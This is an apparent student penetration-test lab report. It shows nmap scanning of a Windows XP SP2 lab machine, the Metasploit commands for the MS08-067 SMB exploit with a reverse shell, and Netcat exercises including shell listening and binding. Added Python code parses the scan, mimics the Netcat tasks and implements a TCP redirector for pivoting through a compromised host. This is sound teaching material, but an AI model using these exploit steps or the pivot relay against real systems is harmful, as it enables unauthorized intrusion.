ODIN Securities

This Report Was Prepared By: ODINSEC
CEO: Phillip Rose
phirose@uat.edu

The information contained within this report is considered educational and for learning purposes only. Inappropriate or unauthorized disclosure of this report, or portions of it, could result in significant damage or negative legal consequences. This report should be distributed to individuals on a need-to-know basis only. Again, this document and all cases in it are hypothetical and for educational and training purposes only.

Contents

Executive Summary of Security Report
  Introduction to Report
  Overview of Report
Operating System Identification
  Kali Linux (current version as of 10/16/2013)
  Windows XP SP2
Tools
  Metasploit Framework
  Netcat
  Custom Script
XP SP2 attack
  Scanning
  Thought process for choosing exploit
  Exploit
NETCAT
  Grab a banner from a TCP service with Netcat and provide a screenshot.
  Use Netcat to show an open port on a system.
  Use Netcat to connect to a web server and issue either a HEAD or a GET request.
  Use Netcat to listen verbosely on a port.
Vulnerable Image attacks
  Scanning
  Thought process for choosing exploit
  Exploit

XP SP2 attack

Scanning

nmap -sS -A 192.168.159.141

Starting Nmap 6.01 ( http://nmap.org ) at 2013-11-13 17:49 EST
Nmap scan report for 192.168.159.141
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:16:8A:C4 (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: AKELLY-D3D808A1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:8a:c4 (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: akelly-d3d808a1
|   NetBIOS computer name: AKELLY-D3D808A1
|   Workgroup: WORKGROUP
|_  System time: 2013-11-13 17:50:05 UTC-7

Service Enumeration

135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Thought process for choosing exploit

Port 445 is open and nmap identifies the service as microsoft-ds, so this host is running SMB directly over TCP on that port, which is the default Windows XP configuration. The OS fingerprint (XP Professional SP2) and the smb-os-discovery script agree on the operating system, and the scripts also report that SMB message signing is disabled and that the guest account was accepted. Based on this, I am going to select an exploit relevant to SMB on Windows XP. After searching through msf, ms08_067_netapi is chosen as it is a known, reliable exploit for this OS.

Exploit

search smb
use exploit/windows/smb/ms08_067_netapi

Setting options for the attack:

show options
set RHOST 192.168.159.141
show payloads
set PAYLOAD windows/shell/reverse_tcp_allports
set LHOST 192.168.159.147
exploit -j

exploit -j runs the module as a background job, so the console stays usable and the resulting shell is picked up with sessions -l and sessions -i. The reverse_tcp_allports stager makes the target try every TCP port back to LHOST until one connects, which is useful when outbound filtering from the target is unknown. The module only succeeds against a host missing the MS08-067 patch, so on a real engagement the module's check command is run before exploit.

NETCAT

1) Grab a banner from a TCP service with Netcat and provide a screenshot.
2) Use Netcat to show an open port on a system.
echo "" | netcat -v -n -w1 192.168.159.141 18-200

With one command, I was able to complete both tasks. This tries every port in the range 18-200: -v reports each connection attempt (so every open port is listed), -n skips DNS lookups, and -w1 gives up on a port after one second. The empty line from echo is sent to each open port and whatever the service answers is printed to the screen. Unfortunately, my machine did not have any banners to display. Services such as SMB and MSRPC wait for the client to speak first, so ports 135, 139 and 445 show as open but return nothing; a banner only appears for a service that greets the client, such as FTP, SMTP or SSH.

3) Use Netcat to connect to a web server and issue either a HEAD or a GET request.
4) Use Netcat to listen verbosely on a port and have the other side send a shell.
5) Bind a shell to a port with Netcat.
6) Create a file called transfer.txt that contains the text "Transfer Me". Now set Netcat up to listen on a port and send this file when the port is connected to.
7) Connect to the system with the shell bound to the port.
8) You are an attacker. Describe a scenario where you would want to or need to use port redirection during an attack.

Most likely, I would do this when I am using a beachhead/zombie machine that I took over in the DMZ to perform scans on my behalf. By using this machine that is compromised early in the pen test, I can get around the IDS by having that machine do the scanning for me.
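Returning to the XP SP2 scan and the thought-process step: the script below is an added example, not part of the original report and not code from nmap or Metasploit. It parses the report's own nmap output (embedded, trimmed to the lines used) and restates the selection reasoning as code. The mapping in candidate_checks() is this example's assumption; the report itself names only ms08_067_netapi, and the output is a list of checks to run, not confirmed vulnerabilities.

```python
"""Parse the nmap -sS -A output from the scan above and restate the
exploit-selection reasoning as code.  Added example, not part of the
original report or of nmap/Metasploit.  NMAP_OUTPUT is the report's own
scan output trimmed to the lines used here; the rules in
candidate_checks() are this example's own assumption."""
import re

# The report's scan output, trimmed to what the parser looks at.
NMAP_OUTPUT = """\
Nmap scan report for 192.168.159.141
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
"""

# 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
# |   OS: Windows XP (Windows 2000 LAN Manager)   (from smb-os-discovery)
SCRIPT_OS_RE = re.compile(r"^\|\s+OS:\s*(.*)$")


def parse_nmap(text):
    """Pull the facts the thought-process step relies on out of normal
    (non-greppable) nmap output."""
    info = {"ports": {}, "cpes": [], "os_details": None,
            "smb_signing_enabled": None, "smb_os": None, "smb_guest": False}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            if state == "open":
                info["ports"][int(port)] = {"proto": proto, "service": service,
                                            "version": (version or "").strip()}
        elif line.startswith("OS CPE:"):
            info["cpes"] = line.split(":", 1)[1].split()
        elif line.startswith("OS details:"):
            info["os_details"] = line.split(":", 1)[1].strip()
        elif "Message signing" in line:
            info["smb_signing_enabled"] = "disabled" not in line
        elif "used for smb scripts: guest" in line:
            info["smb_guest"] = True
        elif SCRIPT_OS_RE.match(line):
            info["smb_os"] = SCRIPT_OS_RE.match(line).group(1)
    return info


def candidate_checks(info):
    """Turn scan facts into an ordered list of things to verify next.
    The XP + SMB -> MS08-067 rule is the report's reasoning; the other two
    only repeat what nmap's own output flags.  Checks to run, not findings."""
    checks = []
    smb = info["ports"].get(445, {}).get("service") == "microsoft-ds"
    xp = (any("windows_xp" in c for c in info["cpes"])
          or (info["smb_os"] or "").startswith("Windows XP"))
    if smb and xp:
        checks.append("exploit/windows/smb/ms08_067_netapi: run 'check' before 'exploit'")
    if smb and info["smb_signing_enabled"] is False:
        checks.append("SMB message signing disabled: nmap flags this as dangerous")
    if info["smb_guest"]:
        checks.append("guest SMB access worked for the nmap scripts: enumerate shares and users")
    return checks


if __name__ == "__main__":
    for check in candidate_checks(parse_nmap(NMAP_OUTPUT)):
        print(check)
```

The parser keys on nmap's normal-output layout (the PORT/STATE/SERVICE table and the `|`-prefixed script results); for production use, nmap's -oX XML output is the stable interface and would replace the regexes.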
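For the Netcat tasks above (port sweep with banner grab, HTTP HEAD, and listen-and-send-a-file), the following is an added example that is not part of the report and does not use Netcat: it reproduces each one-liner with raw Python sockets against constructed local listeners, so the open/closed/silent distinction the report ran into on 135, 139 and 445 can be seen without a second host. The SMTP-style banner, the test-httpd Server header and all port numbers are constructed for the demo.

```python
"""Python socket equivalents of the Netcat tasks in this report.  Added
example, not from the original report and not Netcat itself; it runs
against constructed local listeners so it needs no second host."""
import os
import socket
import tempfile
import threading


def start_listener(handler, host="127.0.0.1"):
    """Test fixture: bind an ephemeral port, serve ONE connection with
    handler(conn) in a background thread, and return the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def scan_and_grab(host, ports, timeout=1.0):
    """Equivalent of:  echo "" | nc -v -n -w1 HOST LO-HI
    Per port: None = closed, "" = open but silent (SMB, MSRPC and most binary
    protocols wait for the client to speak first), else the banner text."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:            # refused, unreachable or timed out
            s.close()
            results[port] = None
            continue
        with s:
            try:
                s.sendall(b"\n")   # the empty line from echo ""
                data = s.recv(1024)
            except OSError:        # reset, or nothing before -w expires
                data = b""
        results[port] = data.decode("latin-1").strip()
    return results


def http_head(host, port, path="/", timeout=2.0):
    """Equivalent of:  printf 'HEAD / HTTP/1.0\\r\\nHost: HOST\\r\\n\\r\\n' | nc HOST PORT
    Returns (status_line, {header-name: value})."""
    req = "HEAD {} HTTP/1.0\r\nHost: {}\r\n\r\n".format(path, host).encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        raw = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def serve_file_once(path):
    """Equivalent of:  nc -l -v -p PORT < transfer.txt  (send, then exit)."""
    with open(path, "rb") as f:
        payload = f.read()
    return start_listener(lambda conn: conn.sendall(payload))


def fetch(host, port, timeout=2.0):
    """Equivalent of:  nc HOST PORT > received.txt  (read until sender closes)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def demo():
    """Run every task against constructed local services; return the results."""
    banner = b"220 mail.example.test ESMTP ready\r\n"        # constructed
    banner_port = start_listener(lambda c: (c.sendall(banner), c.recv(1024)))
    silent_port = start_listener(lambda c: c.recv(1024))      # like SMB: waits
    http_port = start_listener(lambda c: (c.recv(4096), c.sendall(
        b"HTTP/1.0 200 OK\r\nServer: test-httpd/0.1\r\nContent-Length: 0\r\n\r\n")))
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]   # bound then released: closed
    probe.close()

    scan = scan_and_grab("127.0.0.1", [banner_port, silent_port, closed_port])
    status, headers = http_head("127.0.0.1", http_port)
    tmp = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    tmp.write("Transfer Me")
    tmp.close()
    try:
        received = fetch("127.0.0.1", serve_file_once(tmp.name))
    finally:
        os.unlink(tmp.name)
    return {"banner": scan[banner_port], "silent": scan[silent_port],
            "closed": scan[closed_port], "status": status,
            "server": headers.get("server"), "received": received.decode()}


if __name__ == "__main__":
    for key, value in demo().items():
        print("{:9s}{!r}".format(key, value))
```

The three results from scan_and_grab() are the point: a closed port refuses the connection, an open-but-silent port (the SMB case from the report) accepts it and answers nothing, and only a service that greets the client yields a banner. Netcat's -v line is what tells those first two apart, which is why the report's single command covered both tasks.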
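To make the port-redirection scenario concrete, the following is an added example (not from the report and not a real tool) of the minimal TCP redirector an attacker runs on a pivot host such as the DMZ beachhead described above: it listens on the pivot and relays each connection to an internal target, so the attacker's tools connect to the pivot while the target only ever sees the pivot as its peer. Everything runs on loopback; the internal service, its reply format and the message are constructed for the demo.

```python
"""A minimal TCP port redirector of the kind run on a pivot host (rinetd or
'nc -l -p PORT -e "nc TARGET PORT"' style).  Added example, not from the
original report; everything is on loopback so it runs without a second host."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on to dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_redirector(target_host, target_port, listen_host="127.0.0.1", listen_port=0):
    """Listen on listen_host:listen_port; for every client open a fresh
    connection to target_host:target_port and splice the two sockets in both
    directions.  Returns the bound port (listen_port=0 picks an ephemeral one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(5)

    def accept_loop():
        while True:
            client, _ = srv.accept()
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=3)
            except OSError:
                client.close()      # target down: drop this client, keep listening
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_internal_service():
    """Constructed 'internal' host: answers each connection with one line that
    records the peer it saw (the pivot, not the attacker), then hangs up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, peer = srv.accept()
            with conn:
                line = conn.recv(1024)
                conn.sendall(b"internal-svc saw %s:%d -> %s" % (peer[0].encode(), peer[1], line))

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def talk(host, port, message, timeout=3.0):
    """What the attacker's tool does: connect, send, read until the far end
    closes.  A relay tearing the connection down (target unreachable) shows up
    as EOF or a reset; both come back as ""."""
    reply = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(message)
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                reply += chunk
    except OSError:
        pass
    return reply.decode("latin-1")


def demo():
    svc_port = start_internal_service()
    pivot_port = start_redirector("127.0.0.1", svc_port)
    via_pivot = talk("127.0.0.1", pivot_port, b"hello")
    # Edge case: a redirector whose target is not listening.
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]
    probe.close()
    via_dead_pivot = talk("127.0.0.1", start_redirector("127.0.0.1", dead_port), b"hello")
    return {"svc_port": svc_port, "pivot_port": pivot_port,
            "via_pivot": via_pivot, "via_dead_pivot": via_dead_pivot}


if __name__ == "__main__":
    print(demo())
```

The reply line shows why the technique matters to both sides: the internal service logs the pivot's address and an ephemeral port, never the attacker's, which is the same reason the report's beachhead is used to do the scanning. From the defender's side, a DMZ host that suddenly opens new listening ports and originates inbound-looking connections to internal hosts is the signature to alert on.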